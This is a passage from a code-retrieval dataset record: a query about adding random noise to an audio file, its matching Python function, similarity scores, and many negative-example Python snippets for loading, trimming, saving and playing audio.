# Write noise to file\n sf.write('data/{}/{}/{}n.wav'.format(clf, split, filename), noisy, sr)\n #print(\"Noise added to {}\".format(filename))", "def _write(self, source, times=1, file_flag=False, rs_times=None, rs_step=None):\n # if the device isnt initialized properly\n if self._device is None:\n raise SpeakerError\n\n self._duration = None\n self._paused = False\n self._canceled = False\n\n try:\n periodsize = Speaker.PERIOD_SIZE\n\n if file_flag:\n # Open the wav file\n f = wave.open(self._fix_path(source), 'rb') # add error checking here\n\n channels = f.getnchannels()\n framerate = f.getframerate()\n sample_width = f.getsampwidth()\n\n # Read data from file\n data = []\n sample = f.readframes(periodsize)\n while sample:\n data.append(sample)\n sample = f.readframes(periodsize)\n\n # Close file\n f.close()\n else:\n channels = self._channels\n framerate = self.framerate\n sample_width = self.SAMPLE_WIDTH\n\n # Read data from encoded string\n n = len(source)\n step = sample_width * periodsize\n data = [source[i:i+step] for i in range(0, n, step)] # add error checking here\n\n # calculate the duration of the track\n packets = len(data)\n packet_duration = periodsize / self.framerate\n self._duration = (packets * packet_duration)\n\n # Set Device attributes for playback\n self._device.setchannels(channels) # add error checking here\n self._device.setrate(framerate)\n self._device.setperiodsize(periodsize)\n \n # 8bit is unsigned in wav files\n if sample_width == 1:\n self._device.setformat(alsaaudio.PCM_FORMAT_U8)\n # Otherwise we assume signed data, little endian\n elif sample_width == 2:\n self._device.setformat(alsaaudio.PCM_FORMAT_S16_LE)\n elif sample_width == 3:\n self._device.setformat(alsaaudio.PCM_FORMAT_S24_3LE)\n elif sample_width == 4:\n self._device.setformat(alsaaudio.PCM_FORMAT_S32_LE)\n else:\n raise ValueError('Unsupported format')\n\n # Play n times the data\n \n self._play(data, times, rs_times, rs_step) # add error checking here\n except alsaaudio.ALSAAudioError as e:\n print(f\"Caugh is write: {e}\")\n raise SpeakerError\n\n except Exception as e:\n print(f\"Caugh is write: {e}\")\n raise SpeakerError" ]
[ "0.5985446", "0.5802684", "0.57816744", "0.5737059", "0.5693634", "0.5681921", "0.55937463", "0.5582633", "0.5564124", "0.55507296", "0.55322385", "0.5512459", "0.55056393", "0.5496371", "0.54751974", "0.5456971", "0.5410829", "0.5401392", "0.53417194", "0.5321298", "0.53151065", "0.5279356", "0.5265418", "0.5257917", "0.5230108", "0.5228325", "0.5216217", "0.5215454", "0.52043396", "0.52029663", "0.5181512", "0.51600987", "0.5154388", "0.5148526", "0.5132983", "0.5129582", "0.5119381", "0.51178616", "0.5114473", "0.5112685", "0.5109354", "0.51016587", "0.508677", "0.5070801", "0.50675625", "0.5067164", "0.506604", "0.50587773", "0.50565034", "0.5054185", "0.5051101", "0.5051044", "0.5046169", "0.50432855", "0.5039611", "0.50354266", "0.50303763", "0.5018307", "0.5017526", "0.5011662", "0.5009963", "0.50019634", "0.49980593", "0.49963072", "0.4993138", "0.4985534", "0.49817908", "0.49718133", "0.49708998", "0.49673122", "0.4956893", "0.49564046", "0.49533015", "0.49530146", "0.49518892", "0.494921", "0.49373093", "0.49333853", "0.49332204", "0.4931836", "0.49315768", "0.49305362", "0.49151677", "0.4911439", "0.49076998", "0.4903929", "0.49036875", "0.4899635", "0.48990732", "0.48952445", "0.4891799", "0.48904127", "0.48740402", "0.48730284", "0.48691177", "0.4864257", "0.48626244", "0.48622626", "0.48588252", "0.48533323" ]
0.70655805
0
Load an audio file (or segment). Add random noise to the file and save with new filename.
def noisy_data(filename, split='train', clf='gender'): filepath = 'data/{}/{}/{}o.wav'.format(clf, split, filename) audio, sr = librosa.load(filepath, sr=16000) # Add noise noisy = add_noise(audio) # Write noise to file sf.write('data/{}/{}/{}n.wav'.format(clf, split, filename), noisy, sr) #print("Noise added to {}".format(filename))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load_audio(file_path):\n # load the audio file in its original sampling rate\n audio_data, sr = librosa.load(file_path, sr=sampling_rate)\n\n # get the common file name\n file_name = file_path.split(\"/\")[-1]\n file_name = file_name.split(\".wav\")[0]\n\n # calculate number of samples in the time duration needed\n num_samples = int(sr*time_duration)\n\n # get the cut-off audio signals and save them\n for i in np.arange(num_audio_files):\n audio_cut_data = cut_sample(audio_data, num_samples)\n file_path=dir_to_save + file_name + \"_\" + str(i+1) + \".wav\"\n save_sample(audio_cut_data, file_path, sr)\n print(f\"generating signal {str(i)}, its length {len(audio_cut_data)} by cutting the original signal\")", "def transform_audio(self, segment: Union[AudioSegment, SpeechSegment]) -> None:\n noise_data = self._rng.sample(self._noise_data, 1)[0]\n if noise_data[\"duration\"] < segment.duration:\n raise RuntimeError(\"The duration of sampled noise audio is smaller than the audio segment.\")\n diff_duration = noise_data[\"duration\"] - segment.duration\n start = self._rng.uniform(0, diff_duration)\n end = start + segment.duration\n noise_seg = AudioSegment.from_slice_file(noise_data[\"src\"], start=start, end=end)\n snr_dB = self._rng.uniform(self._min_snr_dB, self._max_snr_dB)\n segment.add_noise(noise_seg, snr_dB=snr_dB, allow_downsampling=True, rng=self._rng)", "def load_randomly_augmented_audio(path, sample_rate=16000, tempo_range=(0.85, 1.15),\n gain_range=(-6, 8)):\n low_tempo, high_tempo = tempo_range\n tempo_value = np.random.uniform(low=low_tempo, high=high_tempo)\n low_gain, high_gain = gain_range\n gain_value = np.random.uniform(low=low_gain, high=high_gain)\n audio = augment_audio_with_sox(path=path, sample_rate=sample_rate,\n tempo=tempo_value, gain=gain_value)\n return audio", "def __save(self,audio):\n self.__openSampleFile()\n self.__sampleFile.writeframes(audio)", "def trim_silence_file(file_path, noise_threshold=150):\n rate, audio = scipy.io.wavfile.read(file_path)\n trimmed_audio = trim_silence(audio, noise_threshold=noise_threshold)\n print()\n scipy.io.wavfile.write(file_path, rate, trimmed_audio)", "def audio_file_save(folder_path, current_time, data, name_by_date):\r\n\r\n name_by_time = current_time + '.wav' #timestamp for the audio file name\r\n usage = disk_usage(folder_path)\r\n if usage.used / usage.total < args.storage_threshold:\r\n file_path = os.path.join(folder_path, name_by_time)\r\n\r\n if args.resampling:\r\n sampling_rate = args.resampling_rate\r\n audio = audio_resampling(data)\r\n else:\r\n sampling_rate = args.recording_samplerate\r\n audio = data\r\n\r\n sf.write(file_path , audio, sampling_rate)\r\n\r\n else:\r\n name = os.path.join(folder_path, name_by_date + '.txt')\r\n f = open(name, 'a')\r\n f.write(current_time + '\\t Activity Detected \\n')\r\n f.close()", "def save_separated_audio(self, audios, filename):\n\n # Create folder with mixture name\n folder_path = os.path.join(self.config[\"separated_audio_folder\"], os.path.splitext(filename)[0])\n os.makedirs(folder_path)\n # Save each separated source\n for class_idx, audio in enumerate(audios):\n librosa.output.write_wav(os.path.join(folder_path, self.data_set.classes[class_idx]) + '.wav',\n audio.T,\n sr=self.data_set.config[\"sampling_rate\"])\n # Also copy the mixture in the folder\n copyfile(self.data_set.audio_full_filename(filename), os.path.join(folder_path, \"original_mix.wav\"))", "def gen_random_samples():\n if os.path.exists('Song_Samples'):\n pass\n else:\n os.mkdir('Song_Samples')\n for filename in os.listdir(\"Songs\"):\n rate, data = wavfile.read(os.path.join(\"Songs\", filename))\n song_duration = len(data) // rate\n start_point = randint(0, song_duration - SAMPLE_DURATION)\n end_point = start_point + SAMPLE_DURATION\n subprocess.call(['ffmpeg', '-i', os.path.join(\"Songs\", filename),\n '-ss', str(datetime.timedelta(seconds=start_point)), '-to',\n str(datetime.timedelta(seconds=end_point)), '-y', os.path.join(\"Song_Samples\", filename)])", "def save_sample(file_path, sampling_rate, audio):\n audio = (audio.numpy() * 32768).astype(\"int16\")\n write(file_path, sampling_rate, audio)", "def random_sample(input_name):\n\t#Count number of lines in original file\n\twith open(input_name) as f:\n\t\told_size = len(f.readlines())\n\t#Determine number of lines for new file\n\tnew_size=int(round(sum(1 for row in open(input_name))* args.rnd_sample))\n\t#Create name for sub-sampled file\n\tSampledFileName, SampledExten = os.path.splitext(input_name)\n\tSampledName = '%s_smpld%s' % (SampledFileName,SampledExten)\n\t#Randomly select the desired number of lines and print to new file\n\twith open(SampledName,\"wb\") as sink:\n\t\tfor i in random.sample(range(0, old_size), new_size):\n\t\t\tsink.write(linecache.getline(input_name, i))\n\tlinecache.clearcache()", "def write_audio_to_file(audio: torch.Tensor, sample_id: str = ''):\n global FS_HZ\n assert FS_HZ is not None\n audio_extension = '.wav'\n audio_path = upload_directory + 'sample' + sample_id + audio_extension\n audio_np = audio.cpu().numpy()\n with open(audio_path, 'wb') as f:\n soundfile.write(f,\n audio_np,\n samplerate=FS_HZ)\n return audio_path", "def load_sample(filename):\n return open(os.path.join(SAMPLES, filename)).read()", "def write_audio_segment(self, data):\n cache_name = self.CACHE_FILE_NAME + str(time.time()) + '.wav'\n file = open(cache_name, \"wb\")\n file.write(data)\n file.close()\n return cache_name", "def segment_audio(filename, y_value, split='train', clf='gender'):\n\n filepath = 'recordings/recordings/' + filename + '.mp3'\n audio, sr = librosa.load(filepath, sr=16000)\n audio = normalize(audio)\n\n # Add gender label to filename for later processing\n sex = y_value\n if sex == 'female':\n filename = '{}.F'.format(filename)\n else: filename = '{}.M'.format(filename)\n\n # Segment audio file\n seg_files = segment_10s(audio, sr)\n\n for key, val in seg_files.items():\n new_name = '{}.{}'.format(filename, key)\n sf.write('data/{}/{}/{}o.wav'.format(clf, split, new_name), val, sr)", "def __newSampleFile(self):\n self.__newFileName()\n self.__sampleFile = wav.open(self.__fileName, self.OPEN_MODE)\n self.__sampleFile.setnchannels(NUM_CHANNELS)\n self.__sampleFile.setsampwidth(self.__audio.get_sample_size(self.FORMAT))\n self.__sampleFile.setframerate(FS)", "def save_sound(filename,sound,sample_freq,num_channels):\n #open a wave file in write ('w') mode, this will create the file\n file=wave.open(filename,'w')\n #set the framerate aka sample frequency\n file.setframerate(sample_freq)\n #set the number of the channels\n file.setnchannels(num_channels)\n #the size of the one sample in bytes\n file.setsampwidth(2)\n #write the actual sound to the file, notice the call to get_raw\n file.writeframesraw(sound.get_raw())\n file.close()", "def remove_file(path, save):\n if not save:\n os.remove(path)\n print \"[crawler] removing audio file...\"", "def record_audio_to_file(self, time, file_name):\n sample_width, frames = self.record_audio(time)\n wf = wave.open(file_name, 'wb')\n wf.setnchannels(self.channels)\n wf.setsampwidth(sample_width)\n wf.setframerate(self.rate)\n wf.writeframes(frames)\n wf.close()", "def generate_seg_file(self, filename):\n self._generate_a_seg_file(filename, self.wave[:-4])", "def save(cls, audiobook, file_name):\n os.unlink(file_name)", "def snip(filename,s,e,wout=True):\n n, data, data_dB,sr,ch=inputwav(filename)\n st=int(s*44100)\n en=int(e*44100)\n data_s=data[st:en,:]\n if wout==True:\n print('Exporting...')\n sf.write(filename[0:len(filename)-4]+'_snipped.wav',data_s,sr,'PCM_16')\n print('Done!')\n return data_s", "def load_wav_to_torch(self, full_path):\n data, sampling_rate = load(full_path, sr=self.sampling_rate)\n data = 0.95 * normalize(data)\n\n if self.augment:\n amplitude = np.random.uniform(low=0.3, high=1.0)\n data = data * amplitude\n\n return torch.from_numpy(data).float(), sampling_rate", "def augment_audio_with_sox(path, sample_rate, tempo, gain):\n try:\n with NamedTemporaryFile(suffix=\".wav\") as augmented_file:\n augmented_filename = augmented_file.name\n sox_augment_params = [\"tempo\", \"{:.3f}\".format(tempo), \"gain\", \"{:.3f}\".format(gain)]\n sox_params = \"sox \\\"{}\\\" -r {} -c 1 -b 16 -e si {} {} >/dev/null 2>&1\".format(path, sample_rate,\n augmented_filename,\n \" \".join(sox_augment_params))\n os.system(sox_params)\n y = load_audio(augmented_filename)\n except Exception as E:\n y = load_audio(path)\n return y", "def remove_silence_audio() -> None:\n # Read the wav file and get rate and list of data\n rate, data = scipy.io.wavfile.read('Test.wav')\n\n # Create list for data of amended wav file\n data2 = []\n\n # Loop through data of original file and add data that doesn't meed condition: values >= -10 and <= 10\n for i in range(len(data)):\n if data[i][0] >= -10 and data[i][0] <= 10:\n pass\n else:\n data2.append(data[i])\n\n # Create NumPy array from revised data\n data2 = np.asarray(data2, dtype=np.int16)\n\n # Write new data to wav file\n scipy.io.wavfile.write('Test.wav', rate, data2)\n\n return None", "def make_music_rand():\n pass", "def create_noise_data_from_original():\n # Get the noise values we'll choose from.\n noiseValues = AudioDataOriginal.query.filter(\n AudioDataOriginal.datetime >= '2017-06-14 07:26:24',\n AudioDataOriginal.datetime <= '2017-06-14 07:27:54',\n ).all()\n # Add a noise value to each record with a `processedValue`, as these are the\n # only ones used in the model generation later on.\n audioSamples = AudioDataOriginal.query.filter(\n AudioDataOriginal.datetime > '2017-06-14 07:27:54',\n AudioDataOriginal.processedValue.isnot(None)\n ).all()\n for sample in audioSamples:\n noiseRecord = random.choice(noiseValues)\n sample.noiseValue = noiseRecord.audio\n db.session.commit()", "def sample_sentences_from_file(file, fraction):\n with open(file, 'r') as f:\n lines = f.readlines()\n new_file_size = ceil(fraction*len(lines))\n rand_lines = sample(lines, new_file_size)\n new_file = file+\"_sampled-\"+str(new_file_size)+\".txt\"\n with open(new_file, 'w') as f:\n f.writelines(rand_lines)\n return new_file", "def play_audio(filename):\n os.system(AUDIOPLAYER + ' ' + filename)", "def normalize_audio(audio_path: str, output_path: str, name: str):\n sound = AudioSegment.from_file(audio_path + os.sep + name + '.wav',\n \"wav\")\n change_in_d_bfs = (-20.0) - sound.dBFS\n sound = sound.apply_gain(change_in_d_bfs)\n sound.export(output_path + os.sep + name + '.wav', format=\"wav\")", "def create_noise_dataset(cfg):\n here = os.path.dirname(__file__)\n basedir = os.path.join(here, cfg['data.mix_background_noise.audio_dir'])\n audio_files = find_files(basedir,\n cfg['data.mix_background_noise.audio_regexp'])\n sample_rate = cfg['data.sample_rate']\n audios = [audio.WavFile(fn, sample_rate=sample_rate)\n for fn in tqdm.tqdm(audio_files, 'Reading noise',\n ascii=bool(cfg['tqdm.ascii']))]\n segment_files = [os.path.splitext(fn)[0] + '.csv' for fn in audio_files]\n segments = [read_noise_csv(fn, sample_rate, len(wav))\n if os.path.exists(fn)\n else [(0, len(wav))]\n for fn, wav in zip(segment_files, audios)]\n return NoiseDataset(audios, segments,\n min_length=sample_rate * cfg['data.len_min'])", "def load_sound(self, filename):\n return mixer.Sound(os.path.join(\"sounds\", filename))", "def __newFileName(self):\n now = datetime.now()\n dateTimeAppend = now.strftime('%y%m%d_%H%M%S')\n self.__fileName = '{}/{}_{}.wav'.format(RECORDING,\n FILE_NAME_PREFIX, \n dateTimeAppend)", "def __call__(self, wav):\n beg_i = 0\n end_i = wav.shape[0]\n sel_noise = self.load_noise(self.sample_noise())\n if len(sel_noise) < len(wav):\n # pad noise\n P = len(wav) - len(sel_noise)\n sel_noise = np.pad(sel_noise, (0, P))\n # mode='reflect').view(-1).data.numpy()\n T = end_i - beg_i\n # TODO: not pre-loading noises from files?\n if len(sel_noise) > T:\n n_beg_i = np.random.randint(0, len(sel_noise) - T)\n else:\n n_beg_i = 0\n noise = sel_noise[n_beg_i:n_beg_i + T]\n # randomly sample the SNR level\n snr = random.choice(self.snr_levels)\n K, Ex, En = self.compute_SNR_K(wav, noise, snr)\n scaled_noise = K * noise\n if En > 0:\n noisy_wav = wav + scaled_noise\n noisy_wav = self.norm_energy(noisy_wav, Ex)\n else:\n noisy_wav = wav\n return noisy_wav", "def save(filename_audio, filename_jam, jam, strict=True, fmt=\"auto\", **kwargs):\n\n y = jam.sandbox.muda._audio[\"y\"]\n sr = jam.sandbox.muda._audio[\"sr\"]\n\n # First, dump the audio file\n psf.write(filename_audio, y, sr, **kwargs)\n\n # Then dump the jam\n jam.save(filename_jam, strict=strict, fmt=fmt)", "def _prepare_input_file(self, filename, numlines, maxvalue):\n with open(filename, 'a') as f:\n for _ in range(numlines):\n f.write(str(randrange(maxvalue)) + '\\n')\n self.filepath = f.name", "def append_random_number_to_filename(self, local_img_file):\n date = datetime.datetime.now()\n date_string = date.strftime(\"%m-%d-%Y\")\n return \"%s-glitched.%s\" % (local_img_file.split(\".\")[0], local_img_file.split(\".\")[1])", "def load_audio(path, target_fs=None):\n y, fs = sf.read(path)\n if y.ndim>1:\n y = np.mean(y, axis=1)\n if target_fs is not None and fs!=target_fs:\n #print('Resampling %d->%d...' %(fs, target_fs))\n y = librosa.resample(y, orig_sr=fs, target_sr=target_fs)\n fs = target_fs\n return y, fs", "def splice_audio(file_path, start, end):\n audio = AudioSegment.from_mp3(file_path)\n\n # Pull thumbnail\n tags = ID3(file_path)\n thumbnail = tags.get(\"APIC:\").data\n\n # Pull any other tags from og audio file\n tags = mediainfo(file_path).get('TAG', {})\n\n # Get start and and end paramters\n # to pull the audio splice of interest\n start = timestamp_to_milliseconds(start)\n end = timestamp_to_milliseconds(end)\n\n spliced = audio[start:end]\n spliced.export(\n file_path,\n format=\"mp3\",\n tags=tags\n )\n\n audiofile = eyed3.load(file_path)\n audiofile.tag.images.set(3, thumbnail, 'image/jpeg')\n audiofile.tag.save()", "def random_filename():\n\n return ''.join(random.choices(string.ascii_uppercase + string.digits, k=5))", "def save_audio(self, name=DEFAULT_OUT_NAME):\n print(\"Saving...\")\n wf = wave.open(name+'.wav', 'wb')\n wf.setnchannels(DEFAULT_CHANNELS)\n wf.setsampwidth(self.audio.get_sample_size(DEFAULT_FORMAT))\n wf.setframerate(DEFAULT_RATE)\n wf.writeframes(b''.join(self.frames))\n wf.close()\n print('Saved')", "def create_example(filename, sample_rate, load_audio_with_librosa):\n wav_data = tf.gfile.Open(filename, 'rb').read()\n example_list = list(\n audio_label_data_utils.process_record(\n wav_data=wav_data,\n sample_rate=sample_rate,\n ns=music_pb2.NoteSequence(),\n # decode to handle filenames with extended characters.\n example_id=six.ensure_text(filename, 'utf-8'),\n min_length=0,\n max_length=-1,\n allow_empty_notesequence=True,\n load_audio_with_librosa=load_audio_with_librosa))\n assert len(example_list) == 1\n return example_list[0].SerializeToString()", "def preprocessing(filename):\n reporting(\"Preprocessing file...\", True)\n chdir(path.dirname(filename))\n (rate, sig) = wavefile.load(path.split(filename)[1])\n signal = sig[0]\n\n duration = len(signal) / rate\n reporting(f\"Done. Duration={duration}\")\n return signal", "def preprocess_file(self, filename):\n rawfilename = ''\n for command in [self.mplayer_command, \n self.ffmpeg_command]:\n while True:\n rawfilename = self.random_string()\n if not os.path.exists(rawfilename):\n break\n \n if 0 != subprocess.call(\n command.format(self.SRATE, filename, rawfilename), \n stdout=open(os.devnull, 'w'),\n stderr=subprocess.STDOUT,\n shell=True):\n os.remove(rawfilename)\n rawfilename = None\n continue\n \n break # file is successfully converted\n return rawfilename", "def save_audio(ndarray, feature_name, out_path, x, y, new_labels, filename=None, sr=SR):\n # this is kind-of standard\n filename = filename or FeatureExtractor.get_file_name(x, feature_name, 'wav')\n librosa.output.write_wav(out_path / filename, ndarray, sr=sr, norm=True)\n new_labels.append([filename, y])\n print('info: {} transformed and saved!'.format(filename))\n return filename", "def test_repair_file(self):\n\n audio_path = self.converter.audio\n self.assertTrue(audio_path.endswith('.wav'))\n # Make sure it can be loaded in moviepy\n clip = AudioFileClip(audio_path)", "def save(filepath, src, sample_rate):\n # check if save directory exists\n abs_dirpath = os.path.dirname(os.path.abspath(filepath))\n if not os.path.isdir(abs_dirpath):\n raise OSError(\"Directory does not exist: {}\".format(abs_dirpath))\n # Check/Fix shape of source data\n if len(src.size()) == 1:\n # 1d tensors as assumed to be mono signals\n src.unsqueeze_(1)\n elif len(src.size()) > 2 or src.size(1) > 2:\n raise ValueError(\n \"Expected format (L x N), N = 1 or 2, but found {}\".format(src.size()))\n # check if sample_rate is an integer\n if not isinstance(sample_rate, int):\n if int(sample_rate) == sample_rate:\n sample_rate = int(sample_rate)\n else:\n raise TypeError('Sample rate should be a integer')\n # programs such as librosa normalize the signal, unnormalize if detected\n if src.min() >= -1.0 and src.max() <= 1.0:\n src = src * (1 << 31) # assuming 16-bit depth\n src = src.long()\n # save data to file\n extension = os.path.splitext(filepath)[1]\n check_input(src)\n _torch_sox.write_audio_file(filepath, src, extension[1:], sample_rate)", "def split_multiple_recordings_file(file_path, min_silence_duration=0.25, noise_threshold=150):\n print(file_path)\n rate, audio = scipy.io.wavfile.read(file_path)\n split_recordings = split_multiple_recordings(audio, min_silence_duration=min_silence_duration,\n noise_threshold=noise_threshold, sample_rate_hz=rate)\n\n if file_path.count('.') != 1:\n raise Exception('File_path must contain exactly one period, usually in extension. IE: /home/test.wav')\n\n for idx, recording in enumerate(split_recordings):\n print(\"spliting \" + file_path)\n new_file_path = file_path.split('.')[0] + '_' + str(idx) + \".wav\"\n scipy.io.wavfile.write(new_file_path, rate, recording)", "def save_wav(file_name, signal, fs):\n wavfile.write(file_name, fs, np.int16(signal/np.max(np.abs(signal)) * (2**(16)/2-1)))", "def setFilename(filename='dis.out',overwrite=0):\n if overwrite:\n dislin.filmod('DELETE')\n dislin.setfil(filename)", "async def filename_generator(self):\n chars = list(string.ascii_letters+string.digits)\n name = ''\n for i in range(random.randint(9, 25)):\n name += random.choice(chars)\n\n if name not in self.player['audio_files']:\n return name\n\n return await self.filename_generator()", "def load(name):\n with pyglet.resource.file(f'sounds/{name}.wav', 'rb') as f:\n return pygame.mixer.Sound(f)", "def __init__(self, secs, path, concat=True):\n audio = np.empty((1,))\n secs_loaded = 0\n files_loaded = 0\n files = glob.glob(path + \"*.wav\")\n for file in files:\n (sr, samples) = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n\n # Keep track of the duration (in seconds) of our audio clip\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if (secs_loaded >= secs):\n break\n if not concat:\n break\n \n # We're assuming that all files use the same sampling frequency.\n # Truncate audio samples so that we end up with the duration specified.\n total_samples = int(round(secs * sr))\n if total_samples > len(audio):\n warnings.warn(\"Found fewer than %.2f seconds of audio. \"\n \"Returning %.2f seconds of audio.\" % (secs, len(audio) / sr)) \n audio = audio[0:total_samples]\n\n self.audio = audio\n self.sampling_rate = sr", "def read_audiofile(audio_name,cutToLength):\n fs, data = wavfile.read(audio_name)\n # sa.play_buffer(audio_data, num_channels, bydeftes_per_sample,sample_rate)\n #play_obj = sa.play_buffer(data,1,2,fs)\n #play_obj.stop()\n # delete one column. Make mono channel\n if data.shape[1]>1:\n data = numpy.delete(data,1,1)\n #downsample if signal is broad\n if fs>24000:\n data = numpy.delete(data, numpy.s_[::2], 0)\n fs = int(fs/2)\n \n data = data[data!=0]\n data = numpy.delete(data,numpy.s_[ int(cutToLength*fs):len(data)] )\n return data", "def generate_wavplot(song_name):\n\n filepath = features[features.inferred_name.str.title() == song_name].feature_file.values[0]\n rate, wave = wavfile.read(filepath)\n mono = np.mean(wave, axis=1)\n mono.shape\n plt.figure(figsize=(20,6))\n plt.axis('off')\n plt.plot(mono[::mono.shape[0]//6000], color='white')\n plt.tight_layout;\n friendly_song_name = '_'.join(song_name.split()).lower()\n output_filepath = './static/wavplots/' + friendly_song_name + '.png'\n plt.savefig(output_filepath, bbox_inches='tight', pad_inches=0, transparent=True)\n return output_filepath", "def get_random(filename, out_file, number_of_random_seqs):\n records = Records(Extractor.extract_records(filename))\n random_seqs = records.get_random_seqs(number_of_random_seqs)\n RecordsWriter(random_seqs).write_to(out_file)", "def generate_file(name, size):\n print('=> Generating %s file' % name)\n with open(DATASET_DIR+name+DATASET_EXTENSION, 'wb+') as fout:\n fout.write(os.urandom(size))", "def save_data(self, f): \n if not self.sampling:\n self.convert_to_array()\n np.save(f, self.reads)", "def add_snippets_from_file(path, target, sample_dir, bird_index, rec_index,\n cutoff=0.25, min_snips=None, snip_length=4,\n num_jitters=None, jitter=0.25):\n rate, data = wav_to_raw(path)\n if rate != 44100:\n logging.info('Rate is not 44100 Hz (%s Hz)' % str(rate))\n raw_audio_to_jpgs(data, target, sample_dir, bird_index, rec_index,\n cutoff=cutoff,\n min_snips=min_snips,\n snip_length=snip_length,\n rate=rate,\n num_jitters=num_jitters,\n jitter=jitter)", "def fixed_test_audio(self, num_test_audio):\n test_filenames = np.random.choice(self.filepaths, num_test_audio)\n test_noisy_set = [np.load(f)[1] for f in test_filenames]\n # file names of test samples\n test_basenames = [os.path.basename(fpath) for fpath in test_filenames]\n return test_basenames, np.array(test_noisy_set).reshape(num_test_audio, 1, 16384)", "def load_audio(self):\n df = pd.read_csv(\"{dir}/iteration_{iter}.csv\".format(dir=self.directory, iter=self.iteration),\n usecols=[1, 2, 3])\n\n doa_from_file = df.iloc[0][1]\n wav_name = df.iloc[0][0]\n filename = \"{dir}/{wav_name}\".format(dir=self.directory, wav_name=wav_name)\n\n y, sr = librosa.load(filename, mono=False)\n\n y_8k = librosa.resample(y, sr, 8000)\n result_x = librosa.util.fix_length(y_8k, 8000)\n\n return result_x, doa_from_file", "def play_audio_file(self, fname=DETECT_DONG):\n ding_wav = wave.open(fname, 'rb')\n ding_data = ding_wav.readframes(ding_wav.getnframes())\n # with no_alsa_error():\n audio = pyaudio.PyAudio()\n stream_out = audio.open(\n format=audio.get_format_from_width(ding_wav.getsampwidth()),\n channels=ding_wav.getnchannels(),\n rate=ding_wav.getframerate(), input=False, output=True)\n stream_out.start_stream()\n stream_out.write(ding_data)\n time.sleep(0.2)\n stream_out.stop_stream()\n stream_out.close()\n audio.terminate()", "def add_noise(self, data):", "def add_noise(self, noise):\n if noise > 0.0:\n for key in self.counts:\n self.counts[key] *= 1.0 + noise * np.random.random_sample()", "def play(filename):\n SoundClient(blocking=True).playWave(filename)", "def _make_random_file(self, dir, num_chars=10000):\n filename = os.path.join(dir, \"f-%d\" % random.randint(1, 2**63 - 1))\n content = \"\".join([random.choice(\"0123456789abcdefghijklmnopqrstuvwxyz\\n\") for _ in range(num_chars)])\n with open(filename, \"w\") as f:\n f.writelines(content)\n return filename", "def gravar():\n frase = input(\"Digite a frase a ser gravada: \")\n filename = frase.replace(\" \", \"\").lower() + '.mp3'\n txt = \"{};{}\\n\".format(frase, filename)\n\n # adiciona texto ao arquivo\n with open('frases', 'a') as file:\n file.write(txt)\n\n play_async(text_to_file(frase, filename))", "def transcribe_audio_file(filename):\n url = 'https://api.nexiwave.com/SpeechIndexing/file/storage/' + USERNAME +'/recording/?authData.passwd=' + PASSWORD + '&auto-redirect=true&response=application/json'\n\n # To receive transcript in plain text, instead of html format, comment this line out (for SMS, for example)\n #url = url + '&transcriptFormat=html'\n\n\n # Ready to send:\n sys.stderr.write(\"Send audio for transcript with \" + url + \"\\n\")\n r = requests.post(url, files={'mediaFileData': open(filename,'rb')})\n data = r.json()\n transcript = data['text']\n foo = data['text']\n f = open('newf.txt', 'w')\n f.write(foo)\n f.close() \n # Perform your magic here:\n print \"Transcript for \"+filename+\"=\" + transcript", "def create_wav_file(self, ):\n\n f_out = open(self.wav_file, 'w')\n u_utt2spk = open(self.utt2spk, 'w')\n for file in glob.glob(self.wav_folder+'/*.wav'):\n base = os.path.basename(file).split('.')[0]\n # write to scp file\n f_out.write(base + '\\t' + file + '\\n')\n u_utt2spk.write(base + '\\t' + 'tts' + '\\n')", "def save_file_with_id_name(self, filename):\n file_ = filename.split(os.sep)[-1]\n extension = \".\".join(file_.split(\".\")[-1:])\n filename = str(uuid.uuid4()) + \".\" + extension\n return filename", "def play(sampler, name=\"/Users/Jxie0755/Documents/DXcodings/Learning_Python/CS_61A/week03/mario.wav\", seconds=2):\n out = open(name, \"wb\")\n out.setnchannels(1)\n out.setsampwidth(2)\n out.setframerate(frame_rate)\n t = 0\n while t < seconds * frame_rate:\n sample = sampler(t)\n out.writeframes(encode(sample))\n t = t + 1\n out.close()", "def filesample(filename):\n sampling_rate, samples = wavfile.read(filename)\n times = np.arange(len(samples)) / sampling_rate\n return samples, sampling_rate", "def load_sound(self, name):\n class NoneSound:\n def play(self): pass\n if not pygame.mixer or not pygame.mixer.get_init():\n sound = NoneSound()\n else:\n fullname = os.path.join('TeddyLevel','data', name)\n try:\n sound = pygame.mixer.Sound(fullname)\n except pygame.error, message:\n print 'Cannot load sound:', fullname\n raise SystemExit, message\n dictname = name[0:name.find('.')]\n self.dict[dictname] = sound", "def load_wav(file_name):\n fs, signal = wavfile.read(file_name)\n signal = np.float32(signal) / (2**(16)/2-1)\n return fs, signal", "def generate_random_media_filepath(extension: str):\n\tfilename = f'{_generate_random_string(30)}{extension}'\n\treturn os.path.join(get_media_directory(), filename)", "def detect_netease_music_name(file_path, dist_path, KEEP_SOURCE=True):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0\"\n }\n url_base = \"http://music.163.com/api/song/detail/?id={}&ids=[{}]\"\n\n if not os.path.exists(dist_path):\n os.mkdir(dist_path)\n\n for file_name in os.listdir(file_path):\n if not file_name.endswith(\".mp3\"):\n continue\n if not len(file_name.split(\"-\")) == 3:\n print(\n \">>>> File %s not in format <song id>-<bite rate>-<random number>.mp3\"\n % (file_name)\n )\n continue\n\n try:\n song_id = file_name.split(\"-\")[0]\n url_target = url_base.format(song_id, song_id)\n resp = requests.get(url_target, headers=headers)\n rr = json.loads(resp.text)\n\n tt = eyed3.load(os.path.join(file_path, file_name))\n tt.tag.title = rr[\"songs\"][0][\"name\"].replace(\"\\xa0\", \" \")\n tt.tag.artist = rr[\"songs\"][0][\"artists\"][0][\"name\"]\n tt.tag.album = rr[\"songs\"][0][\"album\"][\"name\"]\n tt.tag.album_artist = rr[\"songs\"][0][\"album\"][\"artists\"][0][\"name\"]\n print(\n \"song_id = %s, tt.tag title = %s, artist = %s, album = %s, album_artist = %s\"\n % (\n song_id,\n tt.tag.title,\n tt.tag.artist,\n tt.tag.album,\n tt.tag.album_artist,\n )\n )\n tt.tag.save()\n except UnicodeEncodeError as e:\n print(\n \">>>> UnicodeEncodeError, try again later: file_name = %s, error = %s\"\n % (file_name, str(e))\n )\n continue\n except:\n print(\">>>> Some other error happens: 